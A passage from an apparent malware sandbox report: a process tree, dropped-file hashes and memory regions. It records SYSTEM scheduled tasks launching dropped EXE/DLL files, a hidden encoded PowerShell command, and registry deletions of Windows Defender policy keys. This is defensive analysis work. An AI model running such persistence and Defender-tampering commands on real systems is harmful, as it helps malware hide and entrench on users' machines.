                                                                                                            2⤵
                                                                                                              PID:3416
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /DELETE /F /TN "gnfhMqZJv"
                                                                                                              2⤵
                                                                                                                PID:660
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /CREATE /TN "VxfUuShlQNbdQSXLl" /SC once /ST 02:37:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dEvNveGTTlDzBjVk\NdOgoxRMZzqSCrz\hyRojpn.exe\" Xe /site_id 525403 /S" /V1 /F
                                                                                                                2⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:2512
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /run /I /tn "VxfUuShlQNbdQSXLl"
                                                                                                                2⤵
                                                                                                                  PID:1808
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2700
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  2⤵
                                                                                                                    PID:3736
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:1848
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:800
                                                                                                                    • C:\Windows\Temp\dEvNveGTTlDzBjVk\NdOgoxRMZzqSCrz\hyRojpn.exe
                                                                                                                      C:\Windows\Temp\dEvNveGTTlDzBjVk\NdOgoxRMZzqSCrz\hyRojpn.exe Xe /site_id 525403 /S
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks computer location settings
                                                                                                                      • Drops Chrome extension
                                                                                                                      • Drops desktop.ini file(s)
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:4692
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /DELETE /F /TN "bmPPeHndeZJiZewMwY"
                                                                                                                        2⤵
                                                                                                                          PID:4364
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                          2⤵
                                                                                                                            PID:4192
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:2008
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                              2⤵
                                                                                                                                PID:4068
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:3644
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SnQMkCffU\pmMXXd.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OwLyLJfWgdznQZv" /V1 /F
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:2552
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TN "OwLyLJfWgdznQZv2" /F /xml "C:\Program Files (x86)\SnQMkCffU\myBRlhk.xml" /RU "SYSTEM"
                                                                                                                                  2⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:2296
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /END /TN "OwLyLJfWgdznQZv"
                                                                                                                                  2⤵
                                                                                                                                    PID:1804
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /DELETE /F /TN "OwLyLJfWgdznQZv"
                                                                                                                                    2⤵
                                                                                                                                      PID:2012
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "gYfjkBJVkoGZVb" /F /xml "C:\Program Files (x86)\PTcVEVWfzVfU2\mvuHQDC.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3360
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "MGVYQKklyNzJH2" /F /xml "C:\ProgramData\DIqJuicHJdmqOkVB\pafYuuP.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:1588
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "JqXblPsAvkoafrXLx2" /F /xml "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR\wEdWBaT.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3572
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "odNIlJBFKFxjoOxUYma2" /F /xml "C:\Program Files (x86)\nNoOyOjreWgVC\jWVtOmO.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3884
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "UjaziEjLbJEPTlLHt" /SC once /ST 04:48:38 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dEvNveGTTlDzBjVk\tfQTemSz\qWCodBZ.dll\",#1 /site_id 525403" /V1 /F
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3632
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /run /I /tn "UjaziEjLbJEPTlLHt"
                                                                                                                                      2⤵
                                                                                                                                        PID:4164
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                        2⤵
                                                                                                                                          PID:1712
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:3824
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                            2⤵
                                                                                                                                              PID:4588
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:3040
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "VxfUuShlQNbdQSXLl"
                                                                                                                                                2⤵
                                                                                                                                                  PID:2376
                                                                                                                                              • C:\Windows\system32\rundll32.EXE
                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dEvNveGTTlDzBjVk\tfQTemSz\qWCodBZ.dll",#1 /site_id 525403
                                                                                                                                                1⤵
                                                                                                                                                  PID:4948
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dEvNveGTTlDzBjVk\tfQTemSz\qWCodBZ.dll",#1 /site_id 525403
                                                                                                                                                    2⤵
                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:5044
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /DELETE /F /TN "UjaziEjLbJEPTlLHt"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4644

                                                                                                                                                  Network

                                                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                                                  Replay Monitor

                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                  Downloads

                                                                                                                                                  • C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR\wEdWBaT.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    cd9d5445408ce3ec64c5fbc2f099e0f6

                                                                                                                                                    SHA1

                                                                                                                                                    9c3a0c486d2269a05f205f2326206f7e5315b0bc

                                                                                                                                                    SHA256

                                                                                                                                                    28d70d456b479376a972de2e3f5277b169d8b1b7911eac36c4a86ac913ba6856

                                                                                                                                                    SHA512

                                                                                                                                                    827b9a258211a6a66b1da2e3e6e1d029ef4de0aaec3a33b204a04158058153782f43dfad3fab2845bd22dd5323e7bd5f82c87a4fad8f9fa9928cc47a0889756d

                                                                                                                                                  • C:\Program Files (x86)\PTcVEVWfzVfU2\mvuHQDC.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    edd2e8e943d24849ad14122b13716066

                                                                                                                                                    SHA1

                                                                                                                                                    1f661a391353a14066d952fb63fef22aa99f81f8

                                                                                                                                                    SHA256

                                                                                                                                                    4a9ef0ac9c556e1302ad1f43fa564176fd5d388210fb3dc2cd59d13aba3125af

                                                                                                                                                    SHA512

                                                                                                                                                    078f44c8195b04f6ec0a09e0ca9c124d5bc6385ef4aaebbbb68957fecd936d81106f48d2b6368ecd14d4828e6d5af88622ceb5313d797a35774dc6403b4fbbb7

                                                                                                                                                  • C:\Program Files (x86)\SnQMkCffU\myBRlhk.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    a1a0de300790b4202734a06d254715d5

                                                                                                                                                    SHA1

                                                                                                                                                    de992b60b9a9f3a3eacc85e7a847ded9a8304388

                                                                                                                                                    SHA256

                                                                                                                                                    a292708c2cf038cd418e1a2f511df9f4f31513a3979b99b39feef7d44f58088c

                                                                                                                                                    SHA512

                                                                                                                                                    f33d1a6fb8a8f4251b10aef3014ed798299e89b87a29f7150dc8eaea8b8c677a3ad644f6dffa8d1ce3191cbc49c17a6fb3af630747f817420f1a4360d60cc302

                                                                                                                                                  • C:\Program Files (x86)\nNoOyOjreWgVC\jWVtOmO.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    a48bdd91f8b6ed371e6cecc0ba71771f

                                                                                                                                                    SHA1

                                                                                                                                                    49f79e845f9790588f3abdec364da2de176c269d

                                                                                                                                                    SHA256

                                                                                                                                                    203aa02c3ac36470dae662845f30d525547c6c62dfe6ee794d44c7cdb0283ce8

                                                                                                                                                    SHA512

                                                                                                                                                    56109b12fd6abe7afc21ff1cc3b01ccb62256625f3bd2123ec12a906514ff8c76ee856ba12a430bcd6bc5b222de79c94dbe3b34b8d1cd514491848b8200a4b9b

                                                                                                                                                  • C:\ProgramData\DIqJuicHJdmqOkVB\pafYuuP.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    15421e9dccddc54ab8878e4855dedffa

                                                                                                                                                    SHA1

                                                                                                                                                    adafb4f043ab36418c3e7891b469ec4c918ce512

                                                                                                                                                    SHA256

                                                                                                                                                    f695c162a501133860ef7108860926ab57129bab808d2910a21b9c47ef68ac25

                                                                                                                                                    SHA512

                                                                                                                                                    d5522d8abe57957a334f10dd2d0617050ba7119c13bb1b17855f981a873f28e153b099d356cb5f44ab906d8bf377823072b698607ba2ed345c5fd62bb7bc08fe

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                    SHA1

                                                                                                                                                    24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                    SHA256

                                                                                                                                                    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                    SHA512

                                                                                                                                                    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Filesize

                                                                                                                                                    64B

                                                                                                                                                    MD5

                                                                                                                                                    a6c9d692ed2826ecb12c09356e69cc09

                                                                                                                                                    SHA1

                                                                                                                                                    def728a6138cf083d8a7c61337f3c9dade41a37f

                                                                                                                                                    SHA256

                                                                                                                                                    a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

                                                                                                                                                    SHA512

                                                                                                                                                    2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSD287.tmp\Install.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.3MB

                                                                                                                                                    MD5

                                                                                                                                                    350fe7d476852e9deef5e0110d54acaf

                                                                                                                                                    SHA1

                                                                                                                                                    4294e22a0d25cd88e7f9b7fdcaffa4efbc119b7e

                                                                                                                                                    SHA256

                                                                                                                                                    e20b8ed1fd2eb846760857847ad28fe23e8be9303051d50ed2f106e952006c9d

                                                                                                                                                    SHA512

                                                                                                                                                    67f60d672d06d173d0f19c5c6448e7e23ac906432a8adb045d7ebff070b78988eef7da722fbfc1dd471537310d5fdd6bfcd07b7b7d4d3c917b22204c27fd5902

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSD287.tmp\Install.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.3MB

                                                                                                                                                    MD5

                                                                                                                                                    350fe7d476852e9deef5e0110d54acaf

                                                                                                                                                    SHA1

                                                                                                                                                    4294e22a0d25cd88e7f9b7fdcaffa4efbc119b7e

                                                                                                                                                    SHA256

                                                                                                                                                    e20b8ed1fd2eb846760857847ad28fe23e8be9303051d50ed2f106e952006c9d

                                                                                                                                                    SHA512

                                                                                                                                                    67f60d672d06d173d0f19c5c6448e7e23ac906432a8adb045d7ebff070b78988eef7da722fbfc1dd471537310d5fdd6bfcd07b7b7d4d3c917b22204c27fd5902

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSDB03.tmp\Install.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    0f71aeb8223298ae92b7f724f95c34ed

                                                                                                                                                    SHA1

                                                                                                                                                    fa1a037194c2bbdac15b8d2677ee24e91f458dd4

                                                                                                                                                    SHA256

                                                                                                                                                    1073ec0e3decc4225f027be1a982262d4a7787958db88bd3bfb1cfc2d0870f7d

                                                                                                                                                    SHA512

                                                                                                                                                    4b6dd6f11be2a9ed6cbc1aad7ab267fe309b522930ddb4ea228d1ac3b91cd2aa1d28e72427e3565814f2d6ec7607b0ff8d534c99f8871928bc6618f29bbe0a01

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSDB03.tmp\Install.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    0f71aeb8223298ae92b7f724f95c34ed

                                                                                                                                                    SHA1

                                                                                                                                                    fa1a037194c2bbdac15b8d2677ee24e91f458dd4

                                                                                                                                                    SHA256

                                                                                                                                                    1073ec0e3decc4225f027be1a982262d4a7787958db88bd3bfb1cfc2d0870f7d

                                                                                                                                                    SHA512

                                                                                                                                                    4b6dd6f11be2a9ed6cbc1aad7ab267fe309b522930ddb4ea228d1ac3b91cd2aa1d28e72427e3565814f2d6ec7607b0ff8d534c99f8871928bc6618f29bbe0a01

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\YjtjmvkzxwbTrRZ\DdGsvFD.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    0f71aeb8223298ae92b7f724f95c34ed

                                                                                                                                                    SHA1

                                                                                                                                                    fa1a037194c2bbdac15b8d2677ee24e91f458dd4

                                                                                                                                                    SHA256

                                                                                                                                                    1073ec0e3decc4225f027be1a982262d4a7787958db88bd3bfb1cfc2d0870f7d

                                                                                                                                                    SHA512

                                                                                                                                                    4b6dd6f11be2a9ed6cbc1aad7ab267fe309b522930ddb4ea228d1ac3b91cd2aa1d28e72427e3565814f2d6ec7607b0ff8d534c99f8871928bc6618f29bbe0a01

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\YjtjmvkzxwbTrRZ\DdGsvFD.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    0f71aeb8223298ae92b7f724f95c34ed

                                                                                                                                                    SHA1

                                                                                                                                                    fa1a037194c2bbdac15b8d2677ee24e91f458dd4

                                                                                                                                                    SHA256

                                                                                                                                                    1073ec0e3decc4225f027be1a982262d4a7787958db88bd3bfb1cfc2d0870f7d

                                                                                                                                                    SHA512

                                                                                                                                                    4b6dd6f11be2a9ed6cbc1aad7ab267fe309b522930ddb4ea228d1ac3b91cd2aa1d28e72427e3565814f2d6ec7607b0ff8d534c99f8871928bc6618f29bbe0a01

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                    Filesize

                                                                                                                                                    1KB

                                                                                                                                                    MD5

                                                                                                                                                    33b19d75aa77114216dbc23f43b195e3

                                                                                                                                                    SHA1

                                                                                                                                                    36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                                                                                                    SHA256

                                                                                                                                                    b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                                                                                                    SHA512

                                                                                                                                                    676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Filesize

                                                                                                                                                    11KB

                                                                                                                                                    MD5

                                                                                                                                                    5ab6ccf709c3d829a5a8ebdc32469f4e

                                                                                                                                                    SHA1

                                                                                                                                                    a833cdef4499a3b4826eafd7c38632feffdac375

                                                                                                                                                    SHA256

                                                                                                                                                    04494891365a535c447119d95e84ad1d3f9ea6a88eb004f1d4a248247353264f

                                                                                                                                                    SHA512

                                                                                                                                                    30503eca1b56d9fc398e04bf8d852e2b063944571034f8fe5ad1932fe8bb6904124e09d1781386c18cf318db5434171f7b7455bed915bfdf378bda8774e97f7c

                                                                                                                                                  • C:\Windows\Temp\dEvNveGTTlDzBjVk\NdOgoxRMZzqSCrz\hyRojpn.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    0f71aeb8223298ae92b7f724f95c34ed

                                                                                                                                                    SHA1

                                                                                                                                                    fa1a037194c2bbdac15b8d2677ee24e91f458dd4

                                                                                                                                                    SHA256

                                                                                                                                                    1073ec0e3decc4225f027be1a982262d4a7787958db88bd3bfb1cfc2d0870f7d

                                                                                                                                                    SHA512

                                                                                                                                                    4b6dd6f11be2a9ed6cbc1aad7ab267fe309b522930ddb4ea228d1ac3b91cd2aa1d28e72427e3565814f2d6ec7607b0ff8d534c99f8871928bc6618f29bbe0a01

                                                                                                                                                  • C:\Windows\Temp\dEvNveGTTlDzBjVk\NdOgoxRMZzqSCrz\hyRojpn.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    0f71aeb8223298ae92b7f724f95c34ed

                                                                                                                                                    SHA1

                                                                                                                                                    fa1a037194c2bbdac15b8d2677ee24e91f458dd4

                                                                                                                                                    SHA256

                                                                                                                                                    1073ec0e3decc4225f027be1a982262d4a7787958db88bd3bfb1cfc2d0870f7d

                                                                                                                                                    SHA512

                                                                                                                                                    4b6dd6f11be2a9ed6cbc1aad7ab267fe309b522930ddb4ea228d1ac3b91cd2aa1d28e72427e3565814f2d6ec7607b0ff8d534c99f8871928bc6618f29bbe0a01

                                                                                                                                                  • C:\Windows\Temp\dEvNveGTTlDzBjVk\tfQTemSz\qWCodBZ.dll

                                                                                                                                                    Filesize

                                                                                                                                                    6.2MB

                                                                                                                                                    MD5

                                                                                                                                                    eb64192097235592e1c78734a09f87cc

                                                                                                                                                    SHA1

                                                                                                                                                    98af1fd001f99c10acdfa60f738fcd4a5db3f3a7

                                                                                                                                                    SHA256

                                                                                                                                                    ac56843fd94fbd505e1276fad558d0a61308bc9b0e68920caa9a9c0d1b868d09

                                                                                                                                                    SHA512

                                                                                                                                                    5b50d6a2b952eef8dd09ce41a9f4adcfe6eb02840dd2349723c1a2634cc54967931a7620ff9f20dbf8fd93708a51d16fb67d96884dd15cb37daf683ac81be1a4

                                                                                                                                                  • C:\Windows\Temp\dEvNveGTTlDzBjVk\tfQTemSz\qWCodBZ.dll

                                                                                                                                                    Filesize

                                                                                                                                                    6.2MB

                                                                                                                                                    MD5

                                                                                                                                                    eb64192097235592e1c78734a09f87cc

                                                                                                                                                    SHA1

                                                                                                                                                    98af1fd001f99c10acdfa60f738fcd4a5db3f3a7

                                                                                                                                                    SHA256

                                                                                                                                                    ac56843fd94fbd505e1276fad558d0a61308bc9b0e68920caa9a9c0d1b868d09

                                                                                                                                                    SHA512

                                                                                                                                                    5b50d6a2b952eef8dd09ce41a9f4adcfe6eb02840dd2349723c1a2634cc54967931a7620ff9f20dbf8fd93708a51d16fb67d96884dd15cb37daf683ac81be1a4

                                                                                                                                                  • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                    Filesize

                                                                                                                                                    5KB

                                                                                                                                                    MD5

                                                                                                                                                    1f974c96c0db84bb17c2651f30fc5f40

                                                                                                                                                    SHA1

                                                                                                                                                    1b2e1ec91446cc4db6c5c43ea9be77a79a16c0af

                                                                                                                                                    SHA256

                                                                                                                                                    88d7746f1a585c271cf1772acf97d89ddf3407deb702eda6792e3be315fe351c

                                                                                                                                                    SHA512

                                                                                                                                                    1f3c17f6770874cf547076a5b845a8114d6ddd3426ea2bfc8b2aa049920af5585dd7da9217ad969ada85d57ccf9955d74e1976deec99d270f1d32e4f3d4025a6

                                                                                                                                                  • C:\Windows\system32\GroupPolicy\gpt.ini

                                                                                                                                                    Filesize

                                                                                                                                                    268B

                                                                                                                                                    MD5

                                                                                                                                                    a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                    SHA1

                                                                                                                                                    1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                    SHA256

                                                                                                                                                    9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                    SHA512

                                                                                                                                                    9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                  • memory/2700-220-0x00007FFA31140000-0x00007FFA31C01000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/2812-163-0x00000000010F0000-0x0000000001126000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    216KB

                                                                                                                                                  • memory/2812-164-0x0000000003BA0000-0x00000000041C8000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    6.2MB

                                                                                                                                                  • memory/2812-165-0x0000000003A20000-0x0000000003A42000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    136KB

                                                                                                                                                  • memory/2812-166-0x0000000004300000-0x0000000004366000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    408KB

                                                                                                                                                  • memory/2812-168-0x00000000049E0000-0x00000000049FE000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    120KB

                                                                                                                                                  • memory/2812-167-0x0000000004370000-0x00000000043D6000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    408KB

                                                                                                                                                  • memory/3640-152-0x00007FFA314A0000-0x00007FFA31F61000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/3640-154-0x00007FFA314A0000-0x00007FFA31F61000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/3640-151-0x000001F4CA5A0000-0x000001F4CA5C2000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    136KB

                                                                                                                                                  • memory/4204-159-0x0000000010000000-0x000000001058C000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    5.5MB

                                                                                                                                                  • memory/4692-232-0x0000000003E40000-0x0000000003EA3000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    396KB

                                                                                                                                                  • memory/4692-228-0x0000000003B00000-0x0000000003B85000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    532KB

                                                                                                                                                  • memory/4692-245-0x0000000004840000-0x00000000048FB000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    748KB

                                                                                                                                                  • memory/4692-242-0x0000000003EB0000-0x0000000003F24000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    464KB

                                                                                                                                                  • memory/4808-138-0x0000000010000000-0x000000001058C000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    5.5MB

                                                                                                                                                  • memory/5044-249-0x0000000001A00000-0x0000000001F8C000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    5.5MB